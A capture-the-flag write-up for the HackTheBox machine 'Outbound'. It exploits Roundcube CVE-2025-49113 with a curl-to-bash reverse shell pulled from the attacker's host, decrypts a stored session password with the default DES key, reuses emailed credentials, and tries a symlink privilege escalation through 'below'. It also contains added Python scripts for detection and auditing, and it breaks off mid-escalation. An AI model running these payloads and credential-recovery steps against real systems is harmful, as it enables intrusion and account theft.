
HackTheBox - Outbound

Outbound exposes a vulnerable version of RoundCube; exploiting it gave us initial access. From there we reached a first user using the database password. The database stores user sessions, and from one of them we obtained another user's password. Credentials exposed in an email then granted access over SSH. Finally we escalated privileges with the below command by way of a symbolic link.

Name: Outbound
OS: Linux
Points: 20
Difficulty: Easy
Release date: 2025-07-12
IP: 10.10.11.83
Maker: TheCyberGeek

Rated: user-rated difficulty chart (votes: Cake 441, VeryEasy 556, Easy 1996, TooEasy 2124, Medium 968, BitHard 406, Hard 267, TooHard 68, ExHard 19, BrainFuck 86)

Machine Information: Certified

The machine description emulates a "real" pentest scenario by providing credentials up front.

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

Recon

nmap

nmap shows the open ports: ssh (22) and http (80).

# Nmap 7.95 scan initiated Sat Jul 12 19:27:16 2025 as: /usr/lib/nmap/nmap --privileged -p22,80 -sV -sC -oN nmap_scan 10.10.11.77
Nmap scan report for 10.10.11.77
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 12 19:27:32 2025 -- 1 IP address (1 host up) scanned in 15.29 seconds

Services Access

The credential pair does not work on the SSH service.

❯ ssh tyler@10.10.11.77
The authenticity of host '10.10.11.77 (10.10.11.77)' can't be established.
ED25519 key fingerprint is SHA256:OZNUeTZ9jastNKKQ1tFXatbeOZzSFg5Dt7nhwhjorR0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.77' (ED25519) to the list of known hosts.
tyler@10.10.11.77's password: 
Permission denied, please try again.
tyler@10.10.11.77's password: 
Permission denied, please try again.
tyler@10.10.11.77's password: 
tyler@10.10.11.77: Permission denied (publickey,password).

Web Site

The website redirects to the domain mail.outbound.htb, which we add to /etc/hosts.

❯ curl -sI 10.10.11.77
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.24.0 (Ubuntu)
Date: Sun, 13 Jul 2025 01:28:55 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://mail.outbound.htb/

The subdomain shows the Roundcube Webmail login page.


Roundcube Webmail

The credentials gave us access. We found no emails or files for tyler, but we did observe the version: Roundcube Webmail 1.6.10.


CVE-2025-49113

This Roundcube version is vulnerable to CVE-2025-49113, which allows executing commands on the machine.

❯ php CVE-2025-49113.php
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Usage: php CVE-2025-49113.php <target_url> <username> <password> <command>

We run the PoC with the URL, the credentials and the command to execute: a request to our HTTP server.

❯ php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "curl 10.10.14.5"
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Retrieving CSRF token and session cookie...

### Authenticating user: tyler

### Authentication successful

### Command to be executed: 
curl 10.10.14.5

### Injecting payload...

### End payload: http://mail.outbound.htb//?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C71%C77%C7%3A%C7%22%C7c%C7u%C7r%C7l%C7+%C71%C70%C7%5C%C72%C7e%C71%C70%C7%5C%C72%C7e%C71%C74%C7%5C%C72%C7e%C75%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

### Payload injected successfully

### Executing payload...

### Exploit executed successfully

We observe that the command was executed.

❯ httphere .
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.77 - - [12/Jul/2025 19:36:56] "GET / HTTP/1.1" 200 -
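As an added detection example (not part of the original writeup), this Python script parses nginx access-log lines and flags the request shape the PoC above produces: an upload request under _task=settings whose _from value, once percent-decoded and stripped of the interleaved 0xC7 filler bytes, contains '!' and a serialized PHP object. The log lines are constructed for this example; the nginx combined log format and the field names are assumptions.

```python
"""Flag CVE-2025-49113-style Roundcube upload requests in nginx access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# nginx "combined" format up to the status code; the remaining fields are not needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP serialize() object marker, e.g. O:16:"Crypt_GPG_Engine" in the PoC payload.
SERIALIZED_OBJECT_RE = re.compile(r'O:\d+:"')


def clean_from(raw: str) -> str:
    """Drop non-ASCII bytes; the PoC interleaves 0xC7 between every payload character."""
    return ''.join(ch for ch in raw if ord(ch) < 0x80)


def inspect_line(line: str):
    """Return an alert dict for an exploit-looking upload request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # latin-1 keeps one character per byte, so the 0xC7 filler bytes survive
    # decoding and can be counted instead of collapsing into U+FFFD.
    params = parse_qs(urlsplit(m['target']).query,
                      keep_blank_values=True, encoding='latin-1')
    if params.get('_task') != ['settings'] or params.get('_action') != ['upload']:
        return None
    reasons, decoded = [], ''
    for raw in params.get('_from', []):
        decoded = clean_from(raw)
        if len(decoded) != len(raw):
            reasons.append('non-ASCII filler bytes in _from')
        if '!' in decoded:
            reasons.append("'!' in _from, as in the PoC payload")
        if SERIALIZED_OBJECT_RE.search(decoded):
            reasons.append('serialized PHP object in _from')
    if not reasons:
        return None
    return {'ip': m['ip'], 'timestamp': m['ts'], 'status': m['status'],
            'decoded_from': decoded, 'reasons': reasons}


def scan(lines) -> list:
    """Run inspect_line over an iterable of log lines and keep the alerts."""
    return [alert for alert in (inspect_line(line) for line in lines) if alert]


# Constructed sample log. The second line reuses the shape of the PoC URL above
# with a much shorter payload; the other lines are ordinary Roundcube traffic.
SAMPLE_LOG = [
    '10.10.14.9 - - [12/Jul/2025:19:30:01 +0000] "GET /?_task=settings&_action=upload'
    '&_from=edit-identity&_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [12/Jul/2025:19:36:55 +0000] "GET /?_from=edit-%21%C7%22%C7%3B%C7O'
    '%C7%3A%C71%C76%C7%3A%C7%22%C7X%C7%22&_task=settings&_framed=1&_action=upload'
    ' HTTP/1.1" 200 154 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [12/Jul/2025:19:37:10 +0000] "GET /?_task=mail&_mbox=INBOX HTTP/1.1"'
    ' 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print(alert)
```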

User - www-data

We launch a reverse shell with shells.

❯ php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "curl 10.10.14.5:8000/10.10.14.5:1335|bash"
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Retrieving CSRF token and session cookie...

### Authenticating user: tyler

### Authentication successful

### Command to be executed: 
curl 10.10.14.5:8000/10.10.14.5:1335|bash

### Injecting payload...

### End payload: http://mail.outbound.htb//?_from=edit-%21%C4%22%C4%3B%C4i%C4%3A%C40%C4%3B%C4O%C4%3A%C41%C46%C4%3A%C4%22%C4C%C4r%C4y%C4p%C4t%C4_%C4G%C4P%C4G%C4_%C4E%C4n%C4g%C4i%C4n%C4e%C4%22%C4%3A%C41%C4%3A%C4%7B%C4S%C4%3A%C42%C46%C4%3A%C4%22%C4%5C%C40%C40%C4C%C4r%C4y%C4p%C4t%C4_%C4G%C4P%C4G%C4_%C4E%C4n%C4g%C4i%C4n%C4e%C4%5C%C40%C40%C4_%C4g%C4p%C4g%C4c%C4o%C4n%C4f%C4%22%C4%3B%C4S%C4%3A%C44%C43%C4%3A%C4%22%C4c%C4u%C4r%C4l%C4+%C41%C40%C4%5C%C42%C4e%C41%C40%C4%5C%C42%C4e%C41%C44%C4%5C%C42%C4e%C45%C4%3A%C48%C40%C40%C40%C4%2F%C41%C40%C4%5C%C42%C4e%C41%C40%C4%5C%C42%C4e%C41%C44%C4%5C%C42%C4e%C45%C4%3A%C41%C43%C43%C45%C4%5C%C47%C4c%C4b%C4a%C4s%C4h%C4%3B%C4%23%C4%22%C4%3B%C4%7D%C4i%C4%3A%C40%C4%3B%C4b%C4%3A%C40%C4%3B%C4%7D%C4%22%C4%3B%C4%7D%C4%7D%C4&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

### Payload injected successfully

### Executing payload...

We obtain access as www-data.

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.5] from mail.outbound.htb [10.10.11.77] 60644
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/roundcube/public_html
$

Database

We find the credentials for the roundcube database in its configuration file.

$ ls config
config.inc.php
config.inc.php.sample
defaults.inc.php
mimetypes.php
$ cat config/config.inc.php | grep -v "// "
<?php

/*
 +-----------------------------------------------------------------------+
 | Local configuration for the Roundcube Webmail installation.           |
 |                                                                       |
 | This is a sample configuration file only containing the minimum       |
 | setup required for a functional installation. Copy more options       |
 | from defaults.inc.php to this file to override the defaults.          |
 |                                                                       |
 | This file is part of the Roundcube Webmail client                     |
 | Copyright (C) The Roundcube Dev Team                                  |
 |                                                                       |
 | Licensed under the GNU General Public License version 3 or            |
 | any later version with exceptions for skins & plugins.                |
 | See the README file for a full license statement.                     |
 +-----------------------------------------------------------------------+
*/

$config = [];

$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

$config['imap_host'] = 'localhost:143';

$config['smtp_host'] = 'localhost:587';

$config['smtp_user'] = '%u';

$config['smtp_pass'] = '%p';

$config['support_url'] = '';

$config['product_name'] = 'Roundcube Webmail';

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

$config['plugins'] = [
    'archive',
    'zipdownload',
];

$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';
$

We see that there are four users on the machine.

$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
tyler:x:1000:1000::/home/tyler:/bin/bash
jacob:x:1001:1001::/home/jacob:/bin/bash
mel:x:1002:1002::/home/mel:/bin/bash
$

User - Tyler

We switch to user tyler with the password we already know.

$ su tyler
Password: LhKL1o9Nm3X2
whoami;id
tyler
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler)

Roundcube Database

We run mysql with the credentials from the roundcube database connection string. The users table shows no password hashes.

www-data@mail:/var/www/html/roundcube/public_html$ mysql -u roundcube -p
Enter password: RCDBPass2025

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 297
Server version: 10.11.13-MariaDB-0ubuntu0.24.04.1 Ubuntu 24.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| roundcube          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use roundcube;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [roundcube]> show tables;
+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache               |
| cache_index         |
| cache_messages      |
| cache_shared        |
| cache_thread        |
| collected_addresses |
| contactgroupmembers |
| contactgroups       |
| contacts            |
| dictionary          |
| filestore           |
| identities          |
| responses           |
| searches            |
| session             |
| system              |
| users               |
+---------------------+
17 rows in set (0.000 sec)

MariaDB [roundcube]> select username, last_login, preferences from users;
+----------+---------------------+-----------------------------------------------------------+
| username | last_login          | preferences                                               |
+----------+---------------------+-----------------------------------------------------------+
| jacob    | 2025-06-11 07:52:49 | a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}         |
| mel      | 2025-06-08 13:29:05 | a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}         |
| tyler    | 2025-08-30 08:24:47 | a:2:{s:11:"client_hash";s:16:"ORT9K3CcgoLcTo2N";i:0;b:0;} |
+----------+---------------------+-----------------------------------------------------------+
MariaDB [roundcube]>

User Password

Because roundcube is a mail client, it does not store passwords in the database. But, being a client, it has to keep the session alive somehow, and this is reflected in the session table, which stores the user's session configuration.

MariaDB [roundcube]> describe session;
+---------+--------------+------+-----+---------------------+-------+
| Field   | Type         | Null | Key | Default             | Extra |
+---------+--------------+------+-----+---------------------+-------+
| sess_id | varchar(128) | NO   | PRI | NULL                |       |
| changed | datetime     | NO   | MUL | 1000-01-01 00:00:00 |       |
| ip      | varchar(40)  | NO   |     | NULL                |       |
| vars    | mediumtext   | NO   |     | NULL                |       |
+---------+--------------+------+-----+---------------------+-------+
4 rows in set (0.001 sec)

MariaDB [roundcube]>

Looking closely, there are multiple sessions; we query the oldest one.

MariaDB [roundcube]> select changed,sess_id from session;
+---------------------+----------------------------+
| changed             | sess_id                    |
+---------------------+----------------------------+
| 2025-06-08 15:46:40 | 6a5ktqih5uca6lj8vrmgh9v0oh |
| 2025-07-13 03:16:09 | o2rmpaur2ji4vqdqb48g0c6bq8 |
| 2025-07-13 03:16:14 | tb84dvo78q3garos55bfnnehsa |
| 2025-07-13 03:22:04 | pp5du1jamtvn0bqintr0uocdlp |
| 2025-07-13 03:22:11 | 0klob0ksv9ol21qpb1250oqfke |
| 2025-07-13 03:22:15 | r2ui8e83c1oj29buok0eds5q85 |
# [...] cut [...]
| 2025-07-13 03:26:39 | 7gctbvpdufu2dnuekr3h1su6a5 |
| 2025-07-13 03:26:45 | i3a4ukv4m12s56odd9pvn6jihh |
+---------------------+----------------------------+
29 rows in set (0.000 sec)

MariaDB [roundcube]> select * from session where sess_id="6a5ktqih5uca6lj8vrmgh9v0oh";
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
changed: 2025-06-08 15:46:40
ip:      172.17.0.1
vars:    bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
1 row in set (0.000 sec)

MariaDB [roundcube]>

The vars value contains the username and password for the session, in this case for user jacob.


Decrypt Password

Roundcube uses the DES-EDE3-CBC cipher to encrypt and decrypt strings, in this case the password value. The key is the one we found earlier in config.inc.php, which is the default key.

We reuse Roundcube's own decryption logic to recover the password.

<?php

// Value of the "password" key from the session vars above (base64-encoded).
$encrypted_b64 = 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/';
$data = base64_decode($encrypted_b64);
// des_key from config.inc.php (the Roundcube default).
$key = 'rcmail-!24ByteDESkey*Str';
$method = 'DES-EDE3-CBC';

// Roundcube prepends the IV to the ciphertext before base64-encoding it.
$iv_size = openssl_cipher_iv_length($method);
$iv      = substr($data, 0, $iv_size);
$cipher  = substr($data, $iv_size);

$decrypted = openssl_decrypt($cipher, $method, $key, OPENSSL_RAW_DATA, $iv);

echo "Decrypted password: $decrypted \n";

Running it prints the recovered value.

❯ php key.php
Decrypted password: 595mO8DmwGeD 
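As an added example (not from the original post or from Roundcube itself), this Python script covers the two steps above from the defender's side: it parses a session.vars blob (base64 of Roundcube's name|serialized-PHP-value format) to find sessions that still hold an encrypted IMAP password, and it checks config.inc.php for the shipped default des_key. The session row is a constructed, shortened version of the row above that reuses its real field names; the decryption step itself is the PHP shown above.

```python
"""Audit Roundcube sessions and config for the weakness exploited above."""
import base64
import re

# Roundcube's shipped default des_key; the config.inc.php above still uses it.
DEFAULT_DES_KEY = 'rcmail-!24ByteDESkey*Str'


class PhpUnserializer:
    """Minimal parser for the PHP serialize() subset Roundcube writes into sessions."""

    def __init__(self, data: bytes):
        self.d = data
        self.i = 0

    def read_until(self, delim: bytes) -> bytes:
        j = self.d.index(delim, self.i)
        tok = self.d[self.i:j]
        self.i = j + 1
        return tok

    def value(self):
        t = self.d[self.i:self.i + 1]
        if t == b'N':                       # "N;" is null
            self.i += 2
            return None
        self.i += 2                         # skip "<type>:"
        if t == b'i':
            return int(self.read_until(b';'))
        if t == b'd':
            return float(self.read_until(b';'))
        if t == b'b':
            return self.read_until(b';') == b'1'
        if t == b's':                       # s:<len>:"<bytes>";
            n = int(self.read_until(b':'))
            s = self.d[self.i + 1:self.i + 1 + n]
            self.i += n + 3                 # quote, bytes, quote, ';'
            return s.decode('utf-8', 'replace')
        if t == b'a':                       # a:<count>:{key value ...}
            n = int(self.read_until(b':'))
            self.i += 1                     # '{'
            out = {}
            for _ in range(n):
                k = self.value()
                out[k] = self.value()
            self.i += 1                     # '}'
            return out
        raise ValueError(f'unsupported PHP type {t!r} at offset {self.i}')


def parse_session_vars(vars_b64: str) -> dict:
    """Decode a session.vars cell: base64 of 'name|<serialized>name|<serialized>...'."""
    raw = base64.b64decode(vars_b64)
    p = PhpUnserializer(raw)
    out = {}
    while p.i < len(raw):
        name = p.read_until(b'|').decode('ascii')
        out[name] = p.value()
    return out


def des_key_from_config(config_text: str):
    """Extract $config['des_key'] from config.inc.php text, or None if absent."""
    m = re.search(r"\$config\['des_key'\]\s*=\s*'([^']*)'", config_text)
    return m.group(1) if m else None


def audit(config_text: str, session_rows: list) -> list:
    """Human-readable findings for the config and the given session table rows."""
    findings = []
    key = des_key_from_config(config_text)
    if key is None or key == DEFAULT_DES_KEY:
        findings.append('des_key is unset or the shipped default: anyone who reads the '
                        'session table can decrypt stored passwords with a known key')
    for row in session_rows:
        sess = parse_session_vars(row['vars'])
        if 'password' in sess:
            findings.append(f"session {row['sess_id']} (ip {row['ip']}, changed "
                            f"{row['changed']}) holds an encrypted IMAP password "
                            f"for user {sess.get('username')!r}")
    return findings


# Constructed sample: Roundcube's real session field names, with the username and
# encrypted password taken from the session row above, re-serialized for this example.
SAMPLE_ROW = {
    'sess_id': '6a5ktqih5uca6lj8vrmgh9v0oh',
    'changed': '2025-06-08 15:46:40',
    'ip': '172.17.0.1',
    'vars': base64.b64encode(
        b'language|s:5:"en_US";'
        b'imap_namespace|a:2:{s:5:"other";N;s:10:"prefix_out";s:0:"";}'
        b'user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";'
        b'storage_port|i:143;storage_ssl|b:0;'
        b'password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;'
    ).decode('ascii'),
}
SAMPLE_CONFIG = "$config['des_key'] = 'rcmail-!24ByteDESkey*Str';\n"

if __name__ == '__main__':
    for finding in audit(SAMPLE_CONFIG, [SAMPLE_ROW]):
        print(finding)
```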

User - Jacob

We use this password to switch to user jacob.

www-data@mail:/var/www/html/roundcube/public_html$ su jacob
Password: 595mO8DmwGeD
jacob@mail:/var/www/html/roundcube/public_html$ whoami;id
jacob
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob)
jacob@mail:/var/www/html/roundcube/public_html$

One of the emails addressed to jacob mentions a password for this user.

Due to the recent change of policies your password has been changed.
Please use the following credentials to log into your account: gY4Wr3a1evp4
Remember to change your password when you next log into your account.
Thanks!
Tyler

jacob@mail:~$ cat /var/mail/jacob
cat /var/mail/jacob
From MAILER_DAEMON  Sat Jun 07 13:59:11 2025
Date: Sat, 07 Jun 2025 13:59:11 +0000
From: Mail System Internal Data <MAILER-DAEMON@mail>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
Message-ID: <1749304751@mail>
X-IMAP: 1749304518 0000000003
Status: RO

This text is part of the internal format of your mail folder, and is not
a real message.  It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.

From tyler@outbound.htb  Sat Jun  7 14:00:58 2025
Return-Path: <tyler@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1000)
	id B32C410248D; Sat,  7 Jun 2025 14:00:58 +0000 (UTC)
To: jacob@outbound.htb
Subject: Important Update
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250607140058.B32C410248D@outbound.htb>
Date: Sat,  7 Jun 2025 14:00:58 +0000 (UTC)
From: tyler@outbound.htb
X-UID: 2                                        
Status: O

Due to the recent change of policies your password has been changed.

Please use the following credentials to log into your account: gY4Wr3a1evp4

Remember to change your password when you next log into your account.

Thanks!

Tyler

From mel@outbound.htb  Sun Jun  8 12:09:45 2025
Return-Path: <mel@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1002)
	id 1487E22C; Sun,  8 Jun 2025 12:09:45 +0000 (UTC)
To: jacob@outbound.htb
Subject: Unexpected Resource Consumption
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250608120945.1487E22C@outbound.htb>
Date: Sun,  8 Jun 2025 12:09:45 +0000 (UTC)
From: mel@outbound.htb
X-UID: 3                                        
Status: O

We have been experiencing high resource consumption on our main server.
For now we have enabled resource monitoring with Below and have granted you privileges to inspect the the logs.
Please inform us immediately if you notice any irregularities.

Thanks!

Mel

jacob@mail:~$

We verify the password against the SSH service and it is accepted.

❯ netexec ssh 10.10.11.77 -u jacob -p gY4Wr3a1evp4
SSH         10.10.11.77     22     10.10.11.77      [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12
SSH         10.10.11.77     22     10.10.11.77      [+] jacob:gY4Wr3a1evp4  Linux - Shell access!

We log in with these credentials and read the user.txt flag.

❯ ssh jacob@10.10.11.77
jacob@10.10.11.77's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-63-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Jul 13 04:08:30 AM UTC 2025

  System load:  0.24              Processes:             265
  Usage of /:   70.5% of 6.73GB   Users logged in:       0
  Memory usage: 10%               IPv4 address for eth0: 10.10.11.77
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jul 10 11:44:49 2025 from 10.10.14.77
jacob@outbound:~$ whoami;id
jacob
uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)
jacob@outbound:~$ ls
user.txt
jacob@outbound:~$ cat user.txt 
c2c5fa4ac9d908533ff85a7d1cb42a9b
jacob@outbound:~$

Privesc

Jacob can run the below command as root.

jacob@outbound:~$ sudo -l -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jacob may run the following commands on outbound:

Sudoers entry: /etc/sudoers
    RunAsUsers: ALL
    RunAsGroups: ALL
    Options: !authenticate
    Commands:
	/usr/bin/below *
	!/usr/bin/below --config*
	!/usr/bin/below --debug*
	!/usr/bin/below -d*
jacob@outbound:~$

Running this command shows the resources used by the services on the machine.


CVE-2025-27591

Below has a vulnerability that allows privilege escalation by means of a symlink at /var/log/below/error_root.log. When below runs, it grants read and write permissions to everyone (0666, rw-rw-rw-) on that file. Creating a symlink from error_root.log to /etc/shadow would therefore allow reading and writing it.

Exploit

We try to reproduce the exploitation by creating a symlink to /etc/shadow.

jacob@outbound:~$ ls -lah /var/log/below/              
total 16K
drwxrwxrwx  3 root  root   4.0K Jul 13 04:27 .
drwxrwxr-x 13 root  syslog 4.0K Jul 13 03:01 ..
-rw-rw-rw-  1 jacob jacob   698 Jul 13 04:16 error_jacob.log
-rw-rw-rw-  1 root  root      0 Jul 13 04:27 error_root.log
drwxr-xr-x  2 root  root   4.0K Jul 13 03:00 store
jacob@outbound:~$ rm /var/log/below/error_root.log
jacob@outbound:~$ ln -sf /etc/shadow /var/log/below/error_root.log
jacob@outbound:~$ ls -lah /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Jul 13 04:28 /var/log/below/error_root.log -> /etc/shadow
jacob@outbound:~$ ls -lah /etc/shadow
-rw-r----- 1 root root 1.2K Jul 13 04:28 /etc/shadow
jacob@outbound:~$

After running below as root, it shows no changes to this file.

jacob@outbound:~$ sudo below record

thread 'main' panicked at below/src/open_source/logging.rs:75:29:
Failed to open log path: Os { code: 1, kind: PermissionDenied, message: "Operation not permitted" }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
jacob@outbound:~$ ls -lah /etc/shadow
-rw-r----- 1 root shadow 1.2K Jul 13 04:30 /etc/shadow
jacob@outbound:~$

We try again with the /etc/passwd file.

